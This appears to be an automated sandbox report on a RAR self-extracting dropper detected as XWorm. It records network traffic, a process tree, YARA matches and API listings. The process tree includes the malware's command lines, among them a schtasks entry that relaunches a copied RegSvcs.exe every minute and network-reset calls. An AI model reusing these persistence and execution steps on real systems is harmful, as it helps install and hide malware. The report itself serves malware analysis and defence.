2024-04-29 09:36:38 UTC	1029	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49729	23.221.246.93	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:46 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-29 09:36:46 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=77222 Date: Mon, 29 Apr 2024 09:36:46 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49730	23.221.246.93	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:47 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-29 09:36:47 UTC	455	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0778) X-CID: 11 Cache-Control: public, max-age=77221 Date: Mon, 29 Apr 2024 09:36:47 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-29 09:36:47 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Target ID:	0
Start time:	11:35:21
Start date:	29/04/2024
Path:	C:\Users\user\Desktop\PO3311926.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO3311926.exe"
Imagebase:	0xba0000
File size:	948'030 bytes
MD5 hash:	543E7940DD0AC8E9E42C0120515EC6B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:35:26
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"
Imagebase:	0x6a0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:35:34
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ipconfig /release
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:35:34
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:35:34
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:35:34
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:35:34
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /release
Imagebase:	0x8f0000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:35:34
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
Wow64 process (32bit):	true
Commandline:	sdadbtvsh.bin nngqrvwq.xl
Imagebase:	0x590000
File size:	947'288 bytes
MD5 hash:	EEAA0F5D82E56659C80FA84D588BF870
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 26%, ReversingLabs Detection: 28%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:35:37
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ipconfig /renew
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:35:37
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:35:37
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /renew
Imagebase:	0x8f0000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:35:41
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xf70000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	11:35:45
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Imagebase:	0x770000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:35:45
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:35:47
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Imagebase:	0xd30000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:35:47
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:35:50
Start date:	29/04/2024
Path:	C:\Users\user\wrse\sdadbtvsh.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Imagebase:	0xa60000
File size:	947'288 bytes
MD5 hash:	EEAA0F5D82E56659C80FA84D588BF870
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 26%, ReversingLabs Detection: 28%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:35:55
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x70000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:36:00
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\RegSvcs.exe"
Imagebase:	0x240000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:36:00
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:36:01
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Imagebase:	0x730000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:36:01
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:36:12
Start date:	29/04/2024
Path:	C:\Users\user\wrse\sdadbtvsh.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Imagebase:	0xa60000
File size:	947'288 bytes
MD5 hash:	EEAA0F5D82E56659C80FA84D588BF870
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:36:16
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xf00000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:36:26
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\RegSvcs.exe"
Imagebase:	0x1b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:36:26
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:36:33
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	11:36:33
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff67e6d0000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	11:36:35
Start date:	29/04/2024
Path:	C:\Users\user\wrse\sdadbtvsh.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Imagebase:	0xa60000
File size:	947'288 bytes
MD5 hash:	EEAA0F5D82E56659C80FA84D588BF870
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:36:42
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x9d0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:37:00
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RegSvcs.exe
Imagebase:	0xd40000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:37:00
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.8%
Total number of Nodes:	1569
Total number of Limit Nodes:	44

Executed Functions

Function 00BBDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BB087C
Part of subcall function 00BB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BB088E
Part of subcall function 00BB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BB08BF

Part of subcall function 00BBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BBA655

Part of subcall function 00BBAC16: OleInitialize.OLE32(00000000), ref: 00BBAC2F
Part of subcall function 00BBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BBAC66
Part of subcall function 00BBAC16: SHGetMalloc.SHELL32(00BE8438), ref: 00BBAC70

GetCommandLineW.KERNEL32 ref: 00BBDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BBDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BBDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00BBDFCE

Part of subcall function 00BBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BBDBF4
Part of subcall function 00BBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BBDC30

CloseHandle.KERNEL32(00000000), ref: 00BBDFD7
GetModuleFileNameW.KERNEL32(00000000,00BFEC90,00000800), ref: 00BBDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00BFEC90), ref: 00BBDFFE
GetLocalTime.KERNEL32(?), ref: 00BBE009
_swprintf.LIBCMT ref: 00BBE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BBE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00BBE061
LoadIconW.USER32(00000000,00000064), ref: 00BBE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BBE0C9
Sleep.KERNELBASE(?), ref: 00BBE0F7
DeleteObject.GDI32 ref: 00BBE130
DeleteObject.GDI32(?), ref: 00BBE140
CloseHandle.KERNEL32 ref: 00BBE183

Strings

sfxstime, xrefs: 00BBE055
STARTDLG, xrefs: 00BBE0BE
sfxname, xrefs: 00BBDFF9
C:\Users\user\Desktop, xrefs: 00BBDF33
winrarsfxmappingfile.tmp, xrefs: 00BBDF77
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00BBE039

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-856837684
Opcode ID: 1114178fc7d18824345adc232bde01e7cc1e99d8b14d4b431f14cd5d83d2f786
Instruction ID: 98c924437d1f4b3f23325d43ce9ff7338ec576233d15d43ca461a5b1813de56f
Opcode Fuzzy Hash: 1114178fc7d18824345adc232bde01e7cc1e99d8b14d4b431f14cd5d83d2f786
Instruction Fuzzy Hash: 9D61F671905245AFD320AB74DC99FBB7BECEB45700F0004AAF505A72A2EFB8D944C762

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6EC
LoadResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA703
LockResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA72D
GlobalLock.KERNEL32(00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA73E
GlobalUnlock.KERNEL32(00000000), ref: 00BBA7C6

Part of subcall function 00BBA626: GdipAlloc.GDIPLUS(00000010), ref: 00BBA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BBA7A7
GlobalFree.KERNEL32(00000000), ref: 00BBA7CD

Strings

PNG, xrefs: 00BBA6C6

Memory Dump Source

